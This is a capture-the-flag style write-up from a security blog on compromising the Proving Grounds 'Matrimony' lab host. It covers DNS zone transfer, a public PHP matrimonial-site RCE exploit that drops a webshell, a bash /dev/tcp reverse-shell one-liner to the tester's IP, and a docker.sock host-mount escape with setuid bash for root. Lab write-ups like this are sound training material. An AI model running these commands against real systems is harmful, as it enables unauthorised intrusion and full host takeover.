SecJournal
  • 👋Welcome
    • SecJournal
    • About Me
  • 👨‍💻Blogs
    • My Blogs
      • Malware
        • Fake WinRAR 0-Day
        • Github 0 Days
      • Scams
        • Social Engineering
        • May Chong
        • Liu Hongtian
        • Packing Green
        • Richard Spindler
        • Ukraine
        • Coalition Tech
        • Telegram Customer Service
      • Exploits
      • Random
        • Upgrade Shells
    • Course Reviews
      • OSCP / PEN-200 Review
      • Certified Red Team Operator (CRTO) Review
      • Certified Red Team Expert (CRTE) Review
      • OSWE / WEB-300 Review
      • OSED / EXP-301 Review
  • 🔐What is Security
    • Information Security
    • Getting Started
      • CTFs
      • Hacking
  • 🖱️Website Security
    • Disclosed Bugs
      • Dutch Government
      • Algolia API Misconfiguration
    • Web
      • MVC Framework
    • SQL Injection
      • Portswigger Labs
    • Access Control
      • Portswigger Labs
    • Authentication Bypass
      • Portswigger Labs
    • Business Logic
      • Portswigger Labs
    • Information Disclosure
      • Portswigger Labs
    • Directory Traversal
      • Portswigger Labs
    • Command Injection
      • Portswigger Labs
    • File Upload Vulnerabilities
      • Portswigger Labs
    • Server-Side Request Forgery
      • Portswigger Labs
    • Cross-Origin Resource Sharing
      • Portswigger Labs
    • Cross-Site Request Forgery
      • Portswigger Labs
    • Cross-Site Scripting
      • Portswigger XSS Labs
      • Portswigger DOM-XSS Labs
    • JSON Web Tokens
      • Portswigger Labs
    • API Testing
      • Portswigger Labs
    • WebSockets
      • Portswigger Labs
    • Deserialization
      • Portswigger Labs
    • Prototype Pollution
      • Portswigger Labs
    • Server-Side Template Injection
      • Portswigger Labs
    • XXE Injection
      • Portswigger Labs
    • Web Cache Poisoning
      • Portswigger Labs
    • HTTP Request Smuggling
      • Portswigger Labs
    • OAuth Authentication
      • Portswigger Labs
  • 👀Buffer Overflows
    • Buffer Overflows
      • System Architecture
      • Compilers, Assemblers, Debuggers and Decompilers
      • Binary Security
      • Address Manipulation
    • OSCP BOF (OUTDATED)
    • Ret2Libc
    • ROP Chaining
    • Canary Bypass
    • ASLR Bypass
  • 🖥️Active Directory
    • Active Directory
    • Tools
    • Windows Authentication
    • Kerberos
      • Delegation
      • Attacking Kerberos
    • ACLs and GPOs
      • Abusing ACLs and GPOs
    • LDAP
  • ✍️Writeups
    • HTB Season 3
      • Analytics
      • Appsanity
      • Codify
      • Devvortex
      • Drive
      • Hospital
      • Manager
      • Napper
      • Surveillance
      • Visual
    • HTB Season 2
      • Authority
      • Bookworm
      • Cozyhosting
      • Cybermonday
      • Download
      • Gofer
      • Intentions
      • Keeper
      • Pilgrimage
      • Rebound
      • RegistryTwo
      • Sandworm
      • Sau
      • Zipping
    • HTB Season 1
      • Agile
      • Busqueda
      • Cerberus
      • Coder
      • Format
      • Inject
      • Mailroom
      • MonitorsTwo
      • OnlyForYou
      • PC
      • Socket
      • Snoopy
    • HackTheBox
      • Easy
        • Academy
        • Access
        • Active
        • Admirer
        • Antique
        • Arctic
        • Armageddon
        • Backdoor
        • Bank
        • Bashed
        • Bastion
        • Blue
        • Blocky
        • Blunder
        • Bounty
        • Broker
        • Buff
        • Curling
        • Doctor
        • Driver
        • Explore
        • Forest
        • FriendZone
        • Frolic
        • GoodGames
        • Granny
        • Heist
        • Help
        • Horizontall
        • Irked
        • Jerry
        • Knife
        • Laboratory
        • Legacy
        • Luanne
        • Love
        • Mirai
        • MetaTwo
        • Nest
        • Netmon
        • Networked
        • Nibbles
        • NodeBlog
        • Omni
        • OpenAdmin
        • OpenSource
        • Optimum
        • Paper
        • Pandora
        • Photobomb
        • Postman
        • Precious
        • Previse
        • RedPanda
        • Remote
        • Return
        • RouterSpace
        • Sauna
        • ScriptKiddie
        • Secret
        • Sense
        • Servmon
        • Shoppy
        • Support
        • Soccer
        • Spectra
        • Squashed
        • SteamCloud
        • Stocker
        • SwagShop
        • Tabby
        • Timelapse
        • Toolbox
        • Topology
        • Traceback
        • Trick
        • TwoMillion
        • Valentine
        • Validation
        • Wifinetic
        • Writeup
      • Medium
        • Ambassador
        • Arkham
        • Atom
        • Backend
        • BackendTwo
        • Bagel
        • Bart
        • Bastard
        • Book
        • BroScience
        • Bucket
        • Cache
        • Canape
        • Cascade
        • Catch
        • Chaos
        • Chatterbox
        • Clicker
        • Cronos
        • Devoops
        • dynstr
        • Encoding
        • Epsilon
        • Escape
        • Faculty
        • Forge
        • Forgot
        • Fuse
        • Giddy
        • Haircut
        • Hawk
        • Intelligence
        • Interface
        • Investigation
        • Jeeves
        • Json
        • Jupiter
        • Lazy
        • Lightweight
        • Magic
        • Mentor
        • Meta
        • Monteverde
        • Nineveh
        • Noter
        • Obscurity
        • October
        • Ophiuchi
        • Outdated
        • Passage
        • Pit
        • Poison
        • Popcorn
        • Querier
        • Ransom
        • Resolute
        • Retired
        • Schooled
        • Scrambled
        • Shared
        • Shibboleth
        • Silo
        • SolidState
        • StreamIO
        • TartarSauce
        • Tenet
        • TheNotebook
        • Time
        • Unattended
        • Undetected
        • Unicode
        • Union
        • UpDown
        • Vault
      • Hard
        • Acute
        • Blackfield
        • BreadCrumbs
        • CarpeDiem
        • Extension
        • Falafel
        • Flight
        • Holiday
        • Kotarak
        • Mantis
        • Monitors
        • Object
        • Oouch
        • Pikaboo
        • Pollution
        • Quick
        • RainyDay
        • Reel
        • Registry
        • Search
        • Seventeen
        • Talkative
        • Unobtainium
        • Vessel
        • Zipper
      • Insane
        • Absolute
        • Anubis
        • APT
        • BrainFuck
        • CrossFit
        • Derailed
        • Fighter
        • Fulcrum
        • Hathor
        • Multimaster
        • pivotapi
        • Sekhmet
        • Sink
        • Sizzle
        • Stacked
    • Proving Grounds Practice
      • Windows
        • Access
        • Algernon
        • AuthBy
        • BillyBoss
        • Butch
        • Craft
        • Craft2
        • DVR4
        • Heist
        • Helpdesk
        • Hutch
        • Internal
        • Jacko
        • Kevin
        • Medjed
        • Nickel
        • Resourced
        • Shenzi
        • Slort
        • Squid
        • Symbolic
        • Vault
        • Vector
      • Linux
        • Apex
        • BadCorp
        • Banzai
        • Blackgate
        • Bratarina
        • Breakout
        • BunyIP
        • Cassios
        • Catto
        • Charlotte
        • Chatty
        • ClamAV
        • Cobweb
        • CookieCutter
        • Deployer
        • Depreciated
        • Develop
        • Dibble
        • Escape
        • Exfiltrated
        • Exghost
        • Fail
        • Fantastic
        • Flasky
        • Forward
        • Hawat
        • Hetemit
        • Hunit
        • Illusion
        • Injecto
        • KeyVault
        • G00g
        • Malbec
        • Mantis
        • Maria
        • Matrimony
        • Megavolt
        • Muddy
        • Nappa
        • Nukem
        • Payday
        • Pebbles
        • Pelican
        • Peppo
        • Phobos
        • Postfish
        • PlanetExpress
        • QuackerJack
        • Readys
        • Reconstruction
        • Roquefort
        • Sirol
        • Shiftdel
        • Shifty
        • Snookums
        • Sona
        • Sorcerer
        • Spaghetti
        • Splodge
        • Surf
        • Sybaris
        • Synapse
        • Tico
        • Thor
        • Twiggy
        • UC404
        • VoIP
        • Walla
        • Wheels
        • XposedAPI
        • ZenPhoto
        • Zino
  • 🐍Evasion
    • Evasion
      • Windows Fundamentals
      • Detection
      • Malware Techniques
  • 🔺Adversary Emulation
    • Red Teaming
      • Adversary Emulation
Powered by GitBook
On this page
  • Gaining Access
  • DNS Enum
  • Matrimonial Website -> RCE
  • Privilege Escalation
  • Docker.Sock -> Root
  1. Writeups
  2. Proving Grounds Practice
  3. Linux

Matrimony

PreviousMariaNextMegavolt

Last updated 1 year ago

Gaining Access

Nmap scan:

$ nmap -p- --min-rate 3000 -Pn 192.168.201.196
Starting Nmap 7.93 ( https://nmap.org ) at 2023-07-15 14:46 +08
Nmap scan report for 192.168.201.196
Host is up (0.17s latency).
Not shown: 65530 closed tcp ports (conn-refused)
PORT      STATE    SERVICE
22/tcp    open     ssh
53/tcp    open     domain
80/tcp    open     http

DNS is open, so we likely need to find a domain name somewhere.

DNS Enum

Port 80 just shows us a static site:

There wasn't anything interesting about this site, so I went back to DNS. Similar to HTB, some machines from PGP tend to have domain names we just enter into our /etc/hosts file. I entered a few like matrimony.pg, matrimony.offsec and matrimony.off.

Then, I tested each domain with dig to see which exists. matrimony.off reveals the most information:

$ dig axfr @192.168.201.196 matrimony.off

; <<>> DiG 9.18.12-1-Debian <<>> axfr @192.168.201.196 matrimony.off
; (1 server found)
;; global options: +cmd
matrimony.off.          604800  IN      SOA     matrimony.off. root.matrimony.off. 4 604800 86400 2419200 604800
matrimony.off.          604800  IN      NS      matrimony.off.
matrimony.off.          604800  IN      A       127.0.0.1
matrimony.off.          604800  IN      AAAA    ::1
prod99.matrimony.off.   604800  IN      CNAME   matrimony.off.
matrimony.off.          604800  IN      SOA     matrimony.off. root.matrimony.off. 4 604800 86400 2419200 604800
;; Query time: 164 msec
;; SERVER: 192.168.201.196#53(192.168.201.196) (TCP)
;; WHEN: Sat Jul 15 14:53:15 +08 2023
;; XFR size: 6 records (messages 1, bytes 226)

It also finds another subdomain at prod99.

Matrimonial Website -> RCE

The prod99 domain shows us this marriage website:

I created an account on the website and found that it runs on PHP. I checked around for exploits for 'matrim':

$ searchsploit matrim
----------------------------------------------------------- ---------------------------------
 Exploit Title                                             |  Path
----------------------------------------------------------- ---------------------------------
2DayBiz Matrimonial Script - 'smartresult.php' SQL Injecti | php/webapps/14073.txt
2DayBiz Matrimonial Script - SQL Injection                 | php/webapps/14008.txt
2DayBiz Matrimonial Script - SQL Injection / Cross-Site Sc | php/webapps/14047.txt
Advanced Matrimonial Script 2.0.3 - SQL Injection          | php/webapps/41521.txt
Entrepreneur Matrimonial Script - Authentication Bypass    | php/webapps/41046.txt
Hindu Matrimonial Script - Authentication Bypass           | php/webapps/41044.txt
i-Net Solution Matrimonial Script 2.0.3 - 'alert.php' Cros | php/webapps/34252.txt
Matri4Web Matrimony Website Script - Multiple SQL Injectio | php/webapps/46591.txt
Matrimonial Script - SQL Injection                         | php/webapps/42545.txt
Matrimonial Script 2.7 - Authentication Bypass             | php/webapps/42566.txt
Matrimonial Website Script 1.0.2 - SQL Injection           | php/webapps/40416.txt
Matrimonial Website Script 2.1.6 - 'uid' SQL Injection     | php/webapps/43965.txt
Matrimony Script - Cross-Site Request Forgery              | php/webapps/10517.txt
Matrimony Script 2.7 - SQL Injection                       | php/webapps/42496.txt
Multireligion Responsive Matrimonial 4.7.2 - 'succid' SQL  | php/webapps/43299.txt
Multireligion Responsive Matrimonial Script 4.7.1 - SQL In | php/webapps/41530.txt
Muslim Matrimonial Script 3.02 - 'succid' SQL Injection    | php/webapps/43310.txt
Online Matrimonial Project 1.0 - Authenticated Remote Code | php/webapps/49183.py
PHP Matrimonial Script 3.0 - SQL Injection                 | php/webapps/41525.txt
Responsive Matrimonial Script 4.0.1 - SQL Injection        | php/webapps/41533.txt
Zeeways Matrimony CMS - SQL Injection                      | php/webapps/46603.txt
----------------------------------------------------------- ---------------------------------

Tons of exploits, and there is one script out of all of them. I tried that first, and it worked:

$ python2 49183.py http://prod99.matrimony.off/ test123 test123
___  ___              _  _          _      ______  _____  _____
|  \/  |             (_)| |        | |     | ___ \/  __ \|  ___|                             
| .  . |  __ _  _ __  _ | |_  __ _ | |     | |_/ /| /  \/| |__                               
| |\/| | / _` || '__|| || __|/ _` || |     |    / | |    |  __|                              
| |  | || (_| || |   | || |_| (_| || |     | |\ \ | \__/\| |___                              
\_|  |_/ \__,_||_|   |_| \__|\__,_||_|     \_| \_| \____/\____/                              
                                                                                             
[+] logging...                                                                               
[+] Successfully retrieved user [ID].
[+] Successfully uploaded.
[+] Connecting to webshell...
[+] Successfully connected to webshell.
$ id
uid=1000(sam) gid=1000(sam) groups=1000(sam)

From here, we can easily get a reverse shell:

$ bash -c 'bash -i >& /dev/tcp/192.168.45.189/21 0>&1'

Privilege Escalation

Docker.Sock -> Root

If we check ifconfig, we can find some Docker instanceis running since the IP of this machine is 172.17.0.1:

sam@matrimony:/home/sam$ ifconfig                                                            
docker0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500                                
        inet 172.17.0.1  netmask 255.255.0.0  broadcast 172.17.255.255                       
        ether 02:42:58:23:b6:06  txqueuelen 0  (Ethernet)
        RX packets 19  bytes 4172 (4.1 KB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 19  bytes 4427 (4.4 KB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

We can ssh into 172.17.0.2 as root:

We can find the docker.sock file in both machines:

root@9079b6b2d2fb:/tmp# find / -name docker.sock 2>/dev/null
/run/docker.sock

This machine doesn't have docker, so we can download the binary itself from our machine. This takes a while. When it's done, we can check the images present:

root@9079b6b2d2fb:/tmp# ./docker images
REPOSITORY   TAG       IMAGE ID       CREATED         SIZE
<none>       <none>    73aebf20ceb1   14 months ago   223MB
ubuntu       latest    3f4714ee068a   14 months ago   77.8MB

We can mount back onto the first image:

./docker -H unix:///run/docker.sock run -it -v /:/mnt 73aebf20ceb1 bash

To get a root shell, simply run chmod u+s /mnt/bin/bash. Exit the docker container back onto the host machine and run bash -p:

Rooted!

✍️